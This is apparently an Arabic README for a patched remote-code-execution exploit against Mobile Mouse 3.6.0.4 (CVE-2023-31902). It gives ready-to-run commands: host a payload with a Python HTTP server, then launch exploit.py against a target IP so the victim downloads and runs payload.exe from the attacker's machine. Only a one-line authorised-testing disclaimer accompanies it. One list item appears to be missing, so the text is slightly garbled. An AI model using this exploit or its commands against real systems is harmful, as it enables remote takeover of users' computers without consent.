
Mobile Mouse 3.6.0.4 - تنفيذ التعليمات البرمجية عن بُعد - CVE-2023-31902
نسخة مصححة من استغلال تنفيذ التعليمات البرمجية عن بُعد الخاص بـ Mobile Mouse 3.6.0.4 المنشور باسم EDB-51010.
يستطيع الاستغلال الأصلي تنزيل الحمولة بنجاح لكنه قد يفشل في تشغيلها لأن كلتا المرحلتين تستخدمان نفس اتصال TCP.
هذه النسخة:
كما أنها تستخدم sendall() ومسارات Windows ذات التهريب الصحيح وفواصل زمنية للـ socket ومعالجة أخطاء أساسية.
شغّل خادم HTTP في مجلد الحمولة:
python3 -m http.server 8080
شغّل الاستغلال:
python3 exploit.py \
--target 192.168.1.50 \
--lhost 192.168.1.10 \
--file payload.exe
هذا المشروع مخصص فقط لاختبارات الأمان المصرّح بها والأبحاث التعليمية. لا تستخدمه ضد أنظمة بدون إذن صريح.